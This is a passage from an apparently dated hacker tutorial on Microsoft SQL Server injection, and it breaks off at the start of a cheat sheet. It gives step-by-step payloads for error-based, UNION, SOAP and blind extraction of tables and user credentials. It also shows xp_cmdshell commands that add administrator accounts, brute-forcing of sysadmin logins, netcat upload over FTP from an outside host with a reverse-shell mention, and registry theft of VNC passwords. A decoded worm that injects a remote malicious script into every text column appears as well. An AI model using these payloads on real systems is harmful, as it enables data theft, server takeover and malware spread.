[End SQLi]--------------------------------------------------------------------------
We will get an error like this:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'users' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
Again, we know the second table = "users", from the error. If we want another table, we just append our known table list. for example,
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
not+in+('threads','users')))--
[End SQLi]--------------------------------------------------------------------------
And we will get an error:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'forums' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
This means the third table = "forums". On the other hand, if the previous request return something like this.
------------------------------------------------------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10
------------------------------------------------------------------------------------
It means this database consists of only two tables, threads and users.
OK, now, we already get all tables. The next target is column names.
The method to retrieve column names is not much different from getting table names.
We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
Don't talk too much, let see an example
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--
[End SQLi]--------------------------------------------------------------------------
From this request, we get an following error
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
------------------------------------------------------------------------------------
As the same approach of getting table names, we abruptly know that the first column of table 'users' is "uname".
For another column name, we add a bit in WHERE clause.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+
and+column_name+not+in+('uname')))--
[End SQLi]--------------------------------------------------------------------------
We will get an below error.
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
------------------------------------------------------------------------------------
Absolutely we know the second column = "upass", of table 'users'. For getting more column names,
we only append a known table list like that in getting table names. For example,
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+
and+column_name+not+in+('uname','upass')))--
[End SQLi]--------------------------------------------------------------------------
The Error message:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'email' to data type int.
/showthread.asp, line 9
------------------------------------------------------------------------------------
So, the third column is "email". but if the error is
------------------------------------------------------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10
------------------------------------------------------------------------------------
This means no more column left. Next is the real target which attackers want, the data.
If take a look carefully, we will see that the idea is not different from getting table and column.
Use the same manner but change only table and column name.
If we want uname data in table users, we can do like this:
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users))--
[End SQLi]--------------------------------------------------------------------------
We will see uname in returned error.
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
Now, we know that there is 'admin' in column 'uname' of table 'users'. For another uname,
we just create a known table list as table and column.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--
[End SQLi]--------------------------------------------------------------------------
Error again:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'cwh' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
OK, we get another "uname" which is 'cwh'. If we try following request.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--
[End SQLi]--------------------------------------------------------------------------
And we get an error like this
------------------------------------------------------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/showthread.asp, line 10
------------------------------------------------------------------------------------
It means there are only two uname in users table (admin,cwh).
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x02d] - MSSQL Injection in Web Services (SOAP Injection)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Web Services use XML messages that follow the SOAP standard and have been popular with traditional enterprise.
In such systems, there is often a machine-readable description of the operations offered by the service written in the
Web Services Description Language (WSDL).
SOAP is often used in large-scale enterprise applications where individual tasks are performed by different computers to
improve performance. It's often found where web application that deployed as a front-end to an existing application.
Let's take a look for SOAP request like this:
[SOAP Request]------------------------------------------------------------------------------
POST /webservice/service.asmx HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetUserInfo"
Host: testcwh.cwh.net
Content-Length: 345
Expect: 100-continue
Connection: Keep-Alive
<soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:body>
<getuserinfo xmlns="http://tempuri.org/"><username>admin</username><password>1234</password></getuserinfo></soap:body></soap:envelope>
[End Request]-------------------------------------------------------------------------------
Can you see username(admin) and password(1234) that send to Server side ?
What's happen if we injection (') single quote to username field like this: <username>admin'</username><password>1234</password>
before It send to Server Side. We can use Web proxy (Burpsuite, Paros proxy) to intercept SOAP request and SOAP respond.
[SOAP Respond When we inject single quote]--------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 26 Jan 2009 15:45:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1057
Connection: close
X-Junk: xxxxxxxxxxx
<soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:body>
<getuserinforesponse xmlns="http://tempuri.org/"><getuserinforesult><erroroccured>true</erroroccured><errorstr>
System.Data.OleDb.OleDbException: Unclosed quotation mark after the character string ''.
Incorrect syntax near '81'.
at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)
at System.Data.OleDb.OleDbDataReader.NextResult()
at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
at Service.GetUserInfo(String username, String password)</errorstr><sqlquery>SELECT * FROM users WHERE username='admin''
AND password='81dc9bdb52d04dc20036dbd8313ed055'</sqlquery><id>-1</id><joindate>0001-01-01T00:00:00</joindate></getuserinforesult>
</getuserinforesponse></soap:body></soap:envelope>
[End Respond]-------------------------------------------------------------------------------
Okey, The SOAP respond return error message like that. We can use simple techiques for SQLi that we showed you
in section [0x02b] - ODBC Error Message Attack with "CONVERT", Let's use this SQLi:
admin' and 1=convert(int,@@version)--
[SOAP Request/Respond]----------------------------------------------------------------------
*** Request ***
POST /webservice/service.asmx HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetUserInfo"
Host: testcwh.cwh.net
Content-Length: 384
<soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:body>
<getuserinfo xmlns="http://tempuri.org/"><username>admin' and 1=convert(int,@@version)--</username><password>1234</password>
</getuserinfo></soap:body></soap:envelope>
*** Response ***
HTTP/1.1 200 OK
Date: Wed, 28 Jan 2009 15:59:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1266
Connection: close
X-Junk: xxxxxxxxxxx
<soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:body>
<getuserinforesponse xmlns="http://tempuri.org/"><getuserinforesult><erroroccured>true</erroroccured><errorstr>
System.Data.OleDb.OleDbException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
Feb 9 2007 22:47:07
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
' to data type int.
at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)
at System.Data.OleDb.OleDbDataReader.NextResult()
at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
at Service.GetUserInfo(String username, String password)</errorstr><sqlquery>SELECT * FROM users WHERE username='admin'
and 1=convert(int,@@version)--' AND password='81dc9bdb52d04dc20036dbd8313ed055'</sqlquery><id>-1</id><joindate>0001-01-01T00:00:00</joindate>
</getuserinforesult></getuserinforesponse></soap:body></soap:envelope>
[End]---------------------------------------------------------------------------------------
W00t!! W00t!!, We can enumerate MSSQL Version : Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86).
Then we can use SQLi techniques that we mention above (Dump tables, columns, data, Etc).
++++++++++++++++++++++++++++++++++++++++++++++
[0x02c] - MSSQL Injection with UNION Attack
++++++++++++++++++++++++++++++++++++++++++++++
This method differs from the both previous methods because we do not get information through error
but we, instead, see it in some point of returned page.
First of all, we have to know the exact number of selected column. We can find it by using ORDER BY clause.
http://www.example.com/page.asp?id=1 order by 1--
http://www.example.com/page.asp?id=1 order by 2--
http://www.example.com/page.asp?id=1 order by 3--
http://www.example.com/page.asp?id=1 order by 4--
and so on
We observe a result from each request until we get error like this.
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e14'
The ORDER BY position number 5 is out of range of the number of items in the select list.
/showthread.asp, line 9
------------------------------------------------------------------------------------
This means this page select four columns from table and this error occurs when we request http://www.example.com/page.asp?id=1 order by 5--
Now, we use UNION operator to gain information.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,44--
[End SQLi]--------------------------------------------------------------------------
We will see "11" or "22" or "33" or "44" appeared on some point in returned page. We assume that
we have already located the position which "44" occur on the screen.
(We should remember this position because it is where our information will be appeared)
As we found "44" on the screen, we replace "44" with "@@version" in order to find the version of MSSQL.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,@@version--
[End SQLi]--------------------------------------------------------------------------
We will see version of MSSQL appeared in the position which "44" occurred.
At this point, we know that next information definitely takes place in this position.
The rest are to find table names, column names and data. As we see in previous section,
we can obtain table names and column names through "information_schema" database.
We still use the same way in this approach.
[SQli]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables--
[End SQLi]--------------------------------------------------------------------------
We will see the first table on the screen. We assume it is table called 'threads'. We can find next table by following request.
[SQli]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables where table_name not in ('threads')--
[End SQLi]--------------------------------------------------------------------------
We assume the retrieved table is 'users'. So, we append a known table list until we get blank in position which "44" occurred.
After we get all table names that we want, we move to gather column names.
[SQli]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users'--
[End SQLi]--------------------------------------------------------------------------
From this request, we will see the first column in table 'users'. We assume it is 'uname'. For another column, we can use following request.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users' and
column_name not in ('uname')--
[End SQLi]--------------------------------------------------------------------------
We get the second column which is 'upass' and we continue appending a known column list until we get blank result.
The most wanted information is data. It is quite simple after we obtained table names and column names. We just use following request.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users--
[End SQLi]--------------------------------------------------------------------------
We will get data such as admin from the request. In order to get another row, we only append information list as following.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users where uname not in ('admin')--
[End SQLi]--------------------------------------------------------------------------
Now, we can enumerate the rest data.
###########################################
[0x03] - MSSQL Blind SQL Injection Attack
###########################################
In some case, Using normal sql injection is not work. Blind sql injection is another method which may help you.
The important point for blind sql injection is the difference between the valid and invalid query result.
You have to inject a statement to make query valid or invalid and observe the response.
Just because you don't see any results, doesn't mean that your injected SQL is not being executed !!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03a] - How to Test sites that are vulnerable in Blind SQL Injection
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
We assume that http://www.example.com/page.asp?id=1 is normal url to open web page.
You can try to inject a statement like this
http://www.example.com/page.asp?id=1 and 1=1
and
http://www.example.com/page.asp?id=1 and 1=2
If the results from these requests are different, it will be a good signal for you.
This website may fall to blind sql injection vulnerability. When you put "id=1 and 1=1",
it means that the condition is true so, the response must be normal.
But the parameter "id=1 and 1=2" indicates that the condition is false
and if the webmaster does not provide a proper filter, the response absolutely differs from previous.
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Determine data through Blind SQL Injection
++++++++++++++++++++++++++++++++++++++++++++++++++++++
By using blind technique, you have to spend more time than normal injection.
You can obtain only one character while you send several queries to server.
We will give you an example of querying the first character of database name.
We assume that database name is member. Therefore, the first character is "m"
which the ascii value is 109. (At this point, we assume that you know ascii code)
Ok, first, we have to know that the results from requests have only 2 forms.
1. Valid query result likes http://www.example.com/page.asp?id=1 and 1=1
2. Invalid query result likes http://www.example.com/page.asp?id=1 and 1=2
The following steps are up to each person. You idea may be different from our idea in order to pick ascii code to test query.
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
In this situation, the result will be valid query result like http://www.example.com/page.asp?id=1 and 1=1
(because the first character of database name is "m" which ascii code is 109). Then, we try
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120
It is surely that the result will like http://www.example.com/page.asp?id=1 and 1=2 (because 109 absolutely less than 120).
next, we try
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105
The result is a valid query result and at this point, the ascii value of first character of database name is between 105 and 120.
So, we try
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108 ===> valid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109 ===> invalid query result
You see that the first character of database name has an ascii value which is greater than 108
but is not greater than 109. Thus, we can conclude that the ascii value is equal to 109.
You can prove with:
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109 .
We sure that the result is like the result of http://www.target.com/page.php?id=1 and 1=1 .
The rest which you have to do is to manipulate some queries to collect your preferred information.
In this tutorial, we propose some example queries in order to find the names of tables and columns in the database.
++++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Exploit query for get Table name
++++++++++++++++++++++++++++++++++++++++++++
In order to get table name, we can use above method to obtain each character of table name.
The only thing that we have to do is to change query to retrieve table name of current database.
As MSSQL does not have limit command. Therefore, the query is a bit complicate.
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),1,1)),0)>97
The above query is used to determine the first character of first table in current database. If we want to find second character of first table,
we can do by following request:
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97
We change the second parameter of substring function from 1 to 2 in order to specify preferred position of character in table name.
Thus, if we want to determine other positions, we require only changing second parameter of substring function.
In case of other tables, we can find other table names by changing the second select
from "SELECT TOP 1" to be "SELECT TOP 2" , "SELECT TOP 3" and so on. for example,
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),1,1)),0)=97
The above request will determine the first character of the second table name in current database.
+++++++++++++++++++++++++++++++++++++++++++++
[0x03d] - Exploit query for get Column name
+++++++++++++++++++++++++++++++++++++++++++++
After we obtain table names, the next target information is absolutely column names.
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97
In order to circumvent from magic quote filtering, you have to change 'tablename'
to be the form of concatenating char() command. for example, if table name is 'user',
when we put 'user' in the query, ' may be filtered and our query will be wrong.
The solution is convert 'user' to be char(117)+char(115)+char(101)+char(114).
So, the query in where cluase changes from "Where name='user'" to "Where name=char(117)+char(115)+char(101)+char(114)".
In this case, we can circumvent magic quote filtering. The result from the above request is the first character of the first column name of specific table.
When we want to find the second character of the first column, we can use the same method as getting table name, by changing the second parameter of
substring function.
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97
The above request is used to determine the second character of the first column name in specific table.
In case of determining other columns, we can do by changing p.x value from 1 to 2,3,4 and so on. such as,
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97
The first character of the second column name in specific table can be determined by the above request.
##############################################
[0x04] - More Dangerous SQL Injection Attack
##############################################
In Chapter [0x02] and [0x03], We described about retrieving any useful data that was extracted from database
via SQL Injection techniques - for example, by performing a UNION Attack, Returning data in an error message and Blind injection.
This chapter will not show only an data extraction but command execution and sql worms as well.
+++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x04a] - Dangerous from Extended Stored Procedures
+++++++++++++++++++++++++++++++++++++++++++++++++++++
xp_cmdshell - Executes a given command on the MSSQL Operation system
- Available by default on all MSSQL (Disabled on MSSQL 2005)
- Can only be executed by 'sa' and any other users with 'sysadmin' privileges
xp_regxxx - Read/Write registry keys, potentially including the Read SAM file
xp_regread
xp_regwrite
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
[Example for determines what null-session shares are available on the server]
exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'
xp_servicecontrol - Allows to Manage Services
[Example Command]--------------------------------------------------------------------
exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
[End Command]------------------------------------------------------------------------
xp_availablemedia - Reveals the available drives on the machine
xp_dirtree - Allows a directory tree to be obtained
xp_enumdsn - Enumerates ODBC data sources on the server
xp_makecab - Allows the user to create a compressed archive of files on the server
xp_ntsec_enumdomains - Enumerates domains that the server can access
xp_terminate_process - Terminate a process (PID)
xp_loginconfig - Login mode
+++++++++++++++++++++++++++++++++++++++++++++
[0x04b] - Advanced SQL Injection Techniques
+++++++++++++++++++++++++++++++++++++++++++++
"xp_cmdshell" Stored procedures, executes any command shell in the server with the same permissions that it is currently running.
By default, only sysadmin is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)
EXEC master.dbo.xp_cmdshell 'net user cwh cwh1234 /add' ;-- //Use for add user "cwh" into system.
EXEC master.dbo.xp_cmdshell 'net localgroup administrators cwh /add' ;-- //Use for escalating privilege "cwh" to admin group
Example through SQL injection in a numeric field via a GET request:
http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1;--
RECONFIGURE;--
EXEC sp_configure 'xp_cmdshell', 1;--
RECONFIGURE;--
On MSSQL 2000:
If you have 'sa' privileges but xp_cmdshell has been disabled/removed with sp_dropextendedproc,
we can simply inject the following code:
EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
This creates a new stored procedure 'xp_anyname' linked to xp_log70.dll, which provides the xp_cmdshell functionality.
If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
** Tip **
[Question]
Determined that the web application connects to the DB with unprivileged account.
So we can't execute XP_CMDSHELL or access any interesting data ?
[Answer]
It's not the end, First we must enumerate MSSQL user accounts that have system administrator privileges.
[Code]--------------------------------------------------------------------------------------
http://www.example.com/news.asp?id=1 union all select null,null,name,null,null,null,null from master..syslogins where name not in ('sa') and sysadmin=1;--
[End Code]----------------------------------------------------------------------------------
[Result]------------------------------------------------------------------------------------
sa
cwh
example
[End Result]--------------------------------------------------------------------------------
We can use "OPENROWSET" to re-connect to the same database server under each enumerated
sysadmin account and guess passwords. This was automated via a Perl script to do brute-force password guessing through the SQL injection:
[Code]--------------------------------------------------------------------------------------
http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','server=VICTIMDBNAME;uid=$USER;pwd=$PASS','select * from master..sysusers')--
[End Code]----------------------------------------------------------------------------------
//Result: Found that "CWH" has a "1234"
Leveraged the "OPENDATASOURCE" function to execute a stored procedure on the database, under the "CWH" system administrator credentials:
[Code]--------------------------------------------------------------------------------------
http://www.example.com/news.asp?id=1; EXEC opendatasource('SQLoledb','Persist Security Info=False;DataSource=VICTIMDBNAME;UserID=CWH;Password=1234').master
.dbo.xp_cmdshell 'net user hacklol 1234 /add';
[End Code]----------------------------------------------------------------------------------
//Dirty Attack: use TFTP Netcat and run a reverse shell. Gained Internet access to the internal network.
= How about Upload of executables ? =
Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server.
A very common choice is netcat.exe, but any trojan will be useful here. If the target is allowed to start FTP connections to the tester's machine,
all that is needed is to inject the following queries:
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
= How about Retrieving VNC Password from Registry ? =
'; declare @out binary(8)
exec master..xp_regread
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'SOFTWARE\ORL\WinVNC3\Default',
@value_name='password',
@value = @out output
select cast (@out as bigint) as x into TEMP--
' and 1 in (select cast(x as varchar) from temp)--
= How about Port Scanning ? =
We can use SQL injection vulnerability as a rudimentary IP/Port Scanner of the Internal Network or Internet
[Code]--------------------------------------------------------------------------------------
http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','uid=sa;pwd=;Network=DBMSSOCN;Address=10.10.10.12,80;timeout=5',
'select * from table')--
[End Code]----------------------------------------------------------------------------------
This Code will outbound the connection to 10.10.10.12 over port 80. If the port is closed, the timeout (5 seconds)
in parameter will be consumed and display error message:
"SQL Server does not exist or access denied"
If port is open, the timeout would not be consumed and error messages will returned:
"General network error. Check your network documentation"
or
"OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error."
This technique, We will be able to map open ports on the IP addresses of hosts on the internal network (w00t !!)
** Note **
This technique can use for Denial of Service (DoS). Just change port to some port such as: FTP (21), and change timeout too high (500).
It's make many connections to target over FTP service (port 21)
++++++++++++++++++++++++++++++++++++++
[0x04c] - Mass MSSQL Injection Worms
++++++++++++++++++++++++++++++++++++++
Recently, we came across a particularly interesting type of SQL Injection that, at times, can be quite difficult to clean,
even with the most robust database backup and recovery scheme. This attack is conducted with the help of an Internet robotalso
known as malbotwhich attacks its prospects daily. It is likely that such a malbot fires the series of injection attempts continuously
and conditionally until the malicious script references are sensed on the targeted web pages. There is nothing new in the way that
the following T-SQL is injected. Yet, the generic nature of the script is somewhat interesting to see.
[SQLi worm]---------------------------------------------------------------------------------
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630068006100720028003200350035
0029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F004300
7500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E
0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E0073002000
6200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D0027007500270020
0061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F0072002000
62002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
[End SQLi]----------------------------------------------------------------------------------
When we decode this SQLi Code with Hex:
[SQLi Decoded]------------------------------------------------------------------------------
DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
[A].[XType] = 'U' /* Table (User-Defined) */ AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* SYSNAME */ OR
[B].[XType] = 167 /* VARCHAR */)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE (@@FETCH_STATUS = 0)
BEGIN
EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''<script src="http://www.fengnima.cn/k.js">
</script>''')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
[End SQLi]----------------------------------------------------------------------------------
What happens as a result? It finds all text fields in the database and adds a link to malicious javascript
<script src="http://www.fengnima.cn/k.js">
</script> to each and every one of them which will make your website display them automatically.
So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as
an article ID, product ID, etc) parameter and tried to use that to upload their SQL injection code.
########################################
[0x05] - MSSQL Injection Cheat Sheet
########################################
** Some of the queries in the table below can only be run by an admin (SA Privilege).
These are marked with "-- priv" at the end of the query. **
+---------------+---------------------------------------------------------------------------+
| Version | SELECT @@version |
|---------------|---------------------------------------------------------------------------|
| Comments | SELECT 1 -- comment |
| | SELECT /*comment*/1 |
|---------------|---------------------------------------------------------------------------|
| | SELECT user_name(); |
| | SELECT system_user; |
| Current User | SELECT user; |
